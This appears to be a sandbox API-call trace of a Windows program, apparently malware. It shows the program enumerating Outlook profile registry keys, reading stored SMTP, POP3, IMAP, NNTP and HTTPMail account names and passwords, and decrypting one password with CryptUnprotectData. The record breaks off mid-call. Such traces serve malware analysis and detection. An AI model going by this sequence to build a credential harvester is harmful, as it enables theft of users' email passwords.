[0147.992] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6ac538 [0147.993] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.993] SHQueryValueExW (in: hkey=0x21c, pszValue="SMTP User Name", pdwReserved=0x0, pdwType=0x0, pvData=0x6ac538, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x6ac538, pcbData=0x19f6b8*=0x208) returned 0x2 [0147.993] GetProcessHeap () returned 0x690000 [0147.994] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac538 | out: hHeap=0x690000) returned 1 [0147.994] GetProcessHeap () returned 0x690000 [0147.994] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6ac538 [0147.995] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.995] SHQueryValueExW (in: hkey=0x21c, pszValue="SMTP User", pdwReserved=0x0, pdwType=0x0, pvData=0x6ac538, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x6ac538, pcbData=0x19f6b8*=0x208) returned 0x2 [0147.995] GetProcessHeap () returned 0x690000 [0147.996] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac538 | out: hHeap=0x690000) returned 1 [0147.996] GetProcessHeap () returned 0x690000 [0147.996] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6ac538 [0147.997] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.997] SHQueryValueExW (in: hkey=0x21c, pszValue="POP3 Server", pdwReserved=0x0, pdwType=0x0, pvData=0x6ac538, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x6ac538, pcbData=0x19f6b8*=0x1a) returned 0x0 [0147.997] GetProcessHeap () returned 0x690000 [0147.997] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac538 | out: hHeap=0x690000) returned 1 [0147.997] GetProcessHeap () returned 0x690000 [0147.997] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6ac538 [0147.998] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.998] SHQueryValueExW (in: hkey=0x21c, pszValue="POP3 User Name", pdwReserved=0x0, pdwType=0x0, pvData=0x6ac538, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x6ac538, pcbData=0x19f6b8*=0x208) returned 0x2 [0147.998] GetProcessHeap () returned 0x690000 [0147.999] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac538 | out: hHeap=0x690000) returned 1 [0147.999] GetProcessHeap () returned 0x690000 [0147.999] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6ac538 [0148.000] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.000] SHQueryValueExW (in: hkey=0x21c, pszValue="POP3 User", pdwReserved=0x0, pdwType=0x0, pvData=0x6ac538, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x6ac538, pcbData=0x19f6b8*=0x1e) returned 0x0 [0148.000] GetProcessHeap () returned 0x690000 [0148.000] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac538 | out: hHeap=0x690000) returned 1 [0148.000] GetProcessHeap () returned 0x690000 [0148.000] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6ac538 [0148.014] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.014] SHQueryValueExW (in: hkey=0x21c, pszValue="NNTP Email Address", pdwReserved=0x0, pdwType=0x0, pvData=0x6ac538, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x6ac538, pcbData=0x19f6b8*=0x208) returned 0x2 [0148.014] GetProcessHeap () returned 0x690000 [0148.015] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac538 | out: hHeap=0x690000) returned 1 [0148.015] GetProcessHeap () returned 0x690000 [0148.015] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6ac538 [0148.016] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.016] SHQueryValueExW (in: hkey=0x21c, pszValue="NNTP User Name", pdwReserved=0x0, pdwType=0x0, pvData=0x6ac538, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x6ac538, pcbData=0x19f6b8*=0x208) returned 0x2 [0148.016] GetProcessHeap () returned 0x690000 [0148.017] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac538 | out: hHeap=0x690000) returned 1 [0148.017] GetProcessHeap () returned 0x690000 [0148.017] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6ac538 [0148.018] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.018] SHQueryValueExW (in: hkey=0x21c, pszValue="NNTP Server", pdwReserved=0x0, pdwType=0x0, pvData=0x6ac538, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x6ac538, pcbData=0x19f6b8*=0x208) returned 0x2 [0148.018] GetProcessHeap () returned 0x690000 [0148.019] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac538 | out: hHeap=0x690000) returned 1 [0148.019] GetProcessHeap () returned 0x690000 [0148.019] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6ac538 [0148.020] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.021] SHQueryValueExW (in: hkey=0x21c, pszValue="IMAP Server", pdwReserved=0x0, pdwType=0x0, pvData=0x6ac538, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x6ac538, pcbData=0x19f6b8*=0x208) returned 0x2 [0148.021] GetProcessHeap () returned 0x690000 [0148.021] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac538 | out: hHeap=0x690000) returned 1 [0148.022] GetProcessHeap () returned 0x690000 [0148.022] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6ac538 [0148.023] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.023] SHQueryValueExW (in: hkey=0x21c, pszValue="IMAP User Name", pdwReserved=0x0, pdwType=0x0, pvData=0x6ac538, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x6ac538, pcbData=0x19f6b8*=0x208) returned 0x2 [0148.023] GetProcessHeap () returned 0x690000 [0148.024] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac538 | out: hHeap=0x690000) returned 1 [0148.024] GetProcessHeap () returned 0x690000 [0148.024] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6ac538 [0148.024] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.025] SHQueryValueExW (in: hkey=0x21c, pszValue="IMAP User", pdwReserved=0x0, pdwType=0x0, pvData=0x6ac538, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x6ac538, pcbData=0x19f6b8*=0x208) returned 0x2 [0148.025] GetProcessHeap () returned 0x690000 [0148.025] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac538 | out: hHeap=0x690000) returned 1 [0148.025] GetProcessHeap () returned 0x690000 [0148.026] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6ac538 [0148.026] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.027] SHQueryValueExW (in: hkey=0x21c, pszValue="HTTP User", pdwReserved=0x0, pdwType=0x0, pvData=0x6ac538, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x6ac538, pcbData=0x19f6b8*=0x208) returned 0x2 [0148.027] GetProcessHeap () returned 0x690000 [0148.027] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac538 | out: hHeap=0x690000) returned 1 [0148.027] GetProcessHeap () returned 0x690000 [0148.027] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6ac538 [0148.028] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.028] SHQueryValueExW (in: hkey=0x21c, pszValue="HTTP Server URL", pdwReserved=0x0, pdwType=0x0, pvData=0x6ac538, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x6ac538, pcbData=0x19f6b8*=0x208) returned 0x2 [0148.028] GetProcessHeap () returned 0x690000 [0148.028] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac538 | out: hHeap=0x690000) returned 1 [0148.029] GetProcessHeap () returned 0x690000 [0148.029] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6ac538 [0148.030] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.030] SHQueryValueExW (in: hkey=0x21c, pszValue="HTTPMail User Name", pdwReserved=0x0, pdwType=0x0, pvData=0x6ac538, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x6ac538, pcbData=0x19f6b8*=0x208) returned 0x2 [0148.030] GetProcessHeap () returned 0x690000 [0148.030] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac538 | out: hHeap=0x690000) returned 1 [0148.030] GetProcessHeap () returned 0x690000 [0148.030] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6ac538 [0148.031] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.032] SHQueryValueExW (in: hkey=0x21c, pszValue="HTTPMail Server", pdwReserved=0x0, pdwType=0x0, pvData=0x6ac538, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x6ac538, pcbData=0x19f6b8*=0x208) returned 0x2 [0148.032] GetProcessHeap () returned 0x690000 [0148.032] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac538 | out: hHeap=0x690000) returned 1 [0148.033] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.033] SHQueryValueExW (in: hkey=0x21c, pszValue="POP3 Port", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x19f6b8, pcbData=0x19f6b4*=0x4 | out: pdwType=0x19f6b0*=0x0, pvData=0x19f6b8, pcbData=0x19f6b4*=0x4) returned 0x2 [0148.034] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.034] SHQueryValueExW (in: hkey=0x21c, pszValue="SMTP Port", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x19f6b8, pcbData=0x19f6b4*=0x4 | out: pdwType=0x19f6b0*=0x0, pvData=0x19f6b8, pcbData=0x19f6b4*=0x4) returned 0x2 [0148.035] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.035] SHQueryValueExW (in: hkey=0x21c, pszValue="IMAP Port", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x19f6b8, pcbData=0x19f6b4*=0x4 | out: pdwType=0x19f6b0*=0x0, pvData=0x19f6b8, pcbData=0x19f6b4*=0x4) returned 0x2 [0148.036] GetProcessHeap () returned 0x690000 [0148.036] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa530 [0148.036] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.037] SHQueryValueExW (in: hkey=0x21c, pszValue="POP3 Password2", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x6aa530, pcbData=0x19f6b4*=0x208 | out: pdwType=0x19f6b0*=0x0, pvData=0x6aa530, pcbData=0x19f6b4*=0x208) returned 0x2 [0148.037] GetProcessHeap () returned 0x690000 [0148.037] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa530 | out: hHeap=0x690000) returned 1 [0148.038] GetProcessHeap () returned 0x690000 [0148.038] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa530 [0148.038] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.039] SHQueryValueExW (in: hkey=0x21c, pszValue="IMAP Password2", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x6aa530, pcbData=0x19f6b4*=0x208 | out: pdwType=0x19f6b0*=0x0, pvData=0x6aa530, pcbData=0x19f6b4*=0x208) returned 0x2 [0148.039] GetProcessHeap () returned 0x690000 [0148.039] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa530 | out: hHeap=0x690000) returned 1 [0148.042] GetProcessHeap () returned 0x690000 [0148.042] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa530 [0148.043] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.043] SHQueryValueExW (in: hkey=0x21c, pszValue="NNTP Password2", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x6aa530, pcbData=0x19f6b4*=0x208 | out: pdwType=0x19f6b0*=0x0, pvData=0x6aa530, pcbData=0x19f6b4*=0x208) returned 0x2 [0148.044] GetProcessHeap () returned 0x690000 [0148.044] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa530 | out: hHeap=0x690000) returned 1 [0148.044] GetProcessHeap () returned 0x690000 [0148.044] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa530 [0148.045] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.045] SHQueryValueExW (in: hkey=0x21c, pszValue="HTTPMail Password2", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x6aa530, pcbData=0x19f6b4*=0x208 | out: pdwType=0x19f6b0*=0x0, pvData=0x6aa530, pcbData=0x19f6b4*=0x208) returned 0x2 [0148.045] GetProcessHeap () returned 0x690000 [0148.046] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa530 | out: hHeap=0x690000) returned 1 [0148.046] GetProcessHeap () returned 0x690000 [0148.046] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa530 [0148.047] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.047] SHQueryValueExW (in: hkey=0x21c, pszValue="SMTP Password2", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x6aa530, pcbData=0x19f6b4*=0x208 | out: pdwType=0x19f6b0*=0x0, pvData=0x6aa530, pcbData=0x19f6b4*=0x208) returned 0x2 [0148.047] GetProcessHeap () returned 0x690000 [0148.048] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa530 | out: hHeap=0x690000) returned 1 [0148.048] GetProcessHeap () returned 0x690000 [0148.048] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa530 [0148.049] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.050] SHQueryValueExW (in: hkey=0x21c, pszValue="POP3 Password", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x6aa530, pcbData=0x19f6b4*=0x208 | out: pdwType=0x19f6b0*=0x3, pvData=0x6aa530*, pcbData=0x19f6b4*=0x121) returned 0x0 [0148.051] LoadLibraryW (lpLibFileName="CRYPT32") returned 0x75d90000 [0148.076] CryptUnprotectData (in: pDataIn=0x19f6ac, ppszDataDescr=0x0, pOptionalEntropy=0x0, pvReserved=0x0, pPromptStruct=0x0, dwFlags=0x1, pDataOut=0x19f6b4 | out: ppszDataDescr=0x0, pDataOut=0x19f6b4) returned 1 [0148.099] GetProcessHeap () returned 0x690000 [0148.099] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x26) returned 0x6a8af0 [0148.100] LocalFree (hMem=0x69d1a8) returned 0x0 [0148.100] GetProcessHeap () returned 0x690000 [0148.100] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8af0 | out: hHeap=0x690000) returned 1 [0148.100] GetProcessHeap () returned 0x690000 [0148.100] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa530 | out: hHeap=0x690000) returned 1 [0148.100] GetProcessHeap () returned 0x690000 [0148.100] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa530 [0148.101] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.101] SHQueryValueExW (in: hkey=0x21c, pszValue="IMAP Password", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x6aa530, pcbData=0x19f6b4*=0x208 | out: pdwType=0x19f6b0*=0x0, pvData=0x6aa530, pcbData=0x19f6b4*=0x208) returned 0x2 [0148.101] GetProcessHeap () returned 0x690000 [0148.101] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa530 | out: hHeap=0x690000) returned 1 [0148.101] GetProcessHeap () returned 0x690000 [0148.102] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa530 [0148.103] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.103] SHQueryValueExW (in: hkey=0x21c, pszValue="NNTP Password", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x6aa530, pcbData=0x19f6b4*=0x208 | out: pdwType=0x19f6b0*=0x0, pvData=0x6aa530, pcbData=0x19f6b4*=0x208) returned 0x2 [0148.103] GetProcessHeap () returned 0x690000 [0148.103] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa530 | out: hHeap=0x690000) returned 1 [0148.103] GetProcessHeap () returned 0x690000 [0148.103] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa530 [0148.104] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.119] SHQueryValueExW (in: hkey=0x21c, pszValue="HTTP Password", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x6aa530, pcbData=0x19f6b4*=0x208 | out: pdwType=0x19f6b0*=0x0, pvData=0x6aa530, pcbData=0x19f6b4*=0x208) returned 0x2 [0148.119] GetProcessHeap () returned 0x690000 [0148.120] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa530 | out: hHeap=0x690000) returned 1 [0148.120] GetProcessHeap () returned 0x690000 [0148.120] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa530 [0148.121] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.121] SHQueryValueExW (in: hkey=0x21c, pszValue="SMTP Password", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x6aa530, pcbData=0x19f6b4*=0x208 | out: pdwType=0x19f6b0*=0x0, pvData=0x6aa530, pcbData=0x19f6b4*=0x208) returned 0x2 [0148.121] GetProcessHeap () returned 0x690000 [0148.122] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa530 | out: hHeap=0x690000) returned 1 [0148.122] GetProcessHeap () returned 0x690000 [0148.122] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac120 | out: hHeap=0x690000) returned 1 [0148.122] GetProcessHeap () returned 0x690000 [0148.122] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f4a) returned 0x6aca08 [0148.123] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0148.124] wvsprintfW (in: param_1=0x6aca08, param_2="%s\\%s", arglist=0x19fb30 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002") returned 97 [0148.124] GetProcessHeap () returned 0x690000 [0148.124] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xc6) returned 0x69e618 [0148.124] GetProcessHeap () returned 0x690000 [0148.124] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aca08 | out: hHeap=0x690000) returned 1 [0148.124] GetProcessHeap () returned 0x690000 [0148.124] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab340 [0148.125] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0148.126] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", phkResult=0x6ab340 | out: phkResult=0x6ab340*=0x22c) returned 0x0 [0148.126] GetProcessHeap () returned 0x690000 [0148.126] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6ac120 [0148.126] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.127] SHEnumKeyExW (in: hkey=0x22c, dwIndex=0x0, pszName=0x6ac120, pcchName=0x19fb1c | out: pszName="", pcchName=0x19fb1c) returned 0x103 [0148.127] GetProcessHeap () returned 0x690000 [0148.127] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac120 | out: hHeap=0x690000) returned 1 [0148.128] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0148.129] RegCloseKey (hKey=0x22c) returned 0x0 [0148.129] GetProcessHeap () returned 0x690000 [0148.129] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab340 | out: hHeap=0x690000) returned 1 [0148.129] GetProcessHeap () returned 0x690000 [0148.129] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x69e618 | out: hHeap=0x690000) returned 1 [0148.130] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0148.130] RegCloseKey (hKey=0x21c) returned 0x0 [0148.130] GetProcessHeap () returned 0x690000 [0148.130] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab370 | out: hHeap=0x690000) returned 1 [0148.131] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.131] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x2, pszName=0x6abd08, pcchName=0x19fb4c | out: pszName="00000003", pcchName=0x19fb4c) returned 0x0 [0148.131] GetProcessHeap () returned 0x690000 [0148.131] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab450 [0148.132] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0148.133] RegOpenKeyW (in: hKey=0x204, lpSubKey="00000003", phkResult=0x6ab450 | out: phkResult=0x6ab450*=0x21c) returned 0x0 [0148.133] GetProcessHeap () returned 0x690000 [0148.133] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6ac120 [0148.133] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.134] SHQueryValueExW (in: hkey=0x21c, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x6ac120, pcbData=0x19f6c0*=0x208 | out: pdwType=0x0, pvData=0x6ac120, pcbData=0x19f6c0*=0x208) returned 0x2 [0148.134] GetProcessHeap () returned 0x690000 [0148.134] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac120 | out: hHeap=0x690000) returned 1 [0148.134] GetProcessHeap () returned 0x690000 [0148.134] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f4a) returned 0x6aca08 [0148.135] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0148.135] wvsprintfW (in: param_1=0x6aca08, param_2="%s\\%s", arglist=0x19fb30 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003") returned 97 [0148.135] GetProcessHeap () returned 0x690000 [0148.135] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xc6) returned 0x69eaf8 [0148.135] GetProcessHeap () returned 0x690000 [0148.136] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aca08 | out: hHeap=0x690000) returned 1 [0148.136] GetProcessHeap () returned 0x690000 [0148.136] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab340 [0148.137] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0148.138] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", phkResult=0x6ab340 | out: phkResult=0x6ab340*=0x22c) returned 0x0 [0148.138] GetProcessHeap () returned 0x690000 [0148.138] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6ac120 [0148.139] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.139] SHEnumKeyExW (in: hkey=0x22c, dwIndex=0x0, pszName=0x6ac120, pcchName=0x19fb1c | out: pszName="", pcchName=0x19fb1c) returned 0x103 [0148.139] GetProcessHeap () returned 0x690000 [0148.140] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac120 | out: hHeap=0x690000) returned 1 [0148.141] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0148.141] RegCloseKey (hKey=0x22c) returned 0x0 [0148.141] GetProcessHeap () returned 0x690000 [0148.141] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab340 | out: hHeap=0x690000) returned 1 [0148.141] GetProcessHeap () returned 0x690000 [0148.142] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x69eaf8 | out: hHeap=0x690000) returned 1 [0148.143] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0148.143] RegCloseKey (hKey=0x21c) returned 0x0 [0148.143] GetProcessHeap () returned 0x690000 [0148.143] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab450 | out: hHeap=0x690000) returned 1 [0148.144] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.144] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x3, pszName=0x6abd08, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0148.144] GetProcessHeap () returned 0x690000 [0148.145] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0148.146] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0148.146] RegCloseKey (hKey=0x204) returned 0x0 [0148.146] GetProcessHeap () returned 0x690000 [0148.146] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab490 | out: hHeap=0x690000) returned 1 [0148.146] GetProcessHeap () returned 0x690000 [0148.147] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0148.147] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0148.148] RegCloseKey (hKey=0x210) returned 0x0 [0148.148] GetProcessHeap () returned 0x690000 [0148.148] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4e0 | out: hHeap=0x690000) returned 1 [0148.149] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.149] SHEnumKeyExW (in: hkey=0x218, dwIndex=0xa, pszName=0x6ab8f0, pcchName=0x19fb7c | out: pszName="dc48e7c6d33441458035ee20beefe18a", pcchName=0x19fb7c) returned 0x0 [0148.149] GetProcessHeap () returned 0x690000 [0148.149] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab420 [0148.150] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0148.151] RegOpenKeyW (in: hKey=0x218, lpSubKey="dc48e7c6d33441458035ee20beefe18a", phkResult=0x6ab420 | out: phkResult=0x6ab420*=0x210) returned 0x0 [0148.151] GetProcessHeap () returned 0x690000 [0148.151] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6abd08 [0148.152] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.153] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x6abd08, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x6abd08, pcbData=0x19f6f0*=0x208) returned 0x2 [0148.153] GetProcessHeap () returned 0x690000 [0148.153] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0148.153] GetProcessHeap () returned 0x690000 [0148.153] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f4a) returned 0x6aca08 [0148.154] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0148.155] wvsprintfW (in: param_1=0x6aca08, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc48e7c6d33441458035ee20beefe18a") returned 88 [0148.155] GetProcessHeap () returned 0x690000 [0148.155] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb4) returned 0x6aa2c8 [0148.155] GetProcessHeap () returned 0x690000 [0148.155] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aca08 | out: hHeap=0x690000) returned 1 [0148.165] GetProcessHeap () returned 0x690000 [0148.165] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4a0 [0148.166] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0148.167] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc48e7c6d33441458035ee20beefe18a", phkResult=0x6ab4a0 | out: 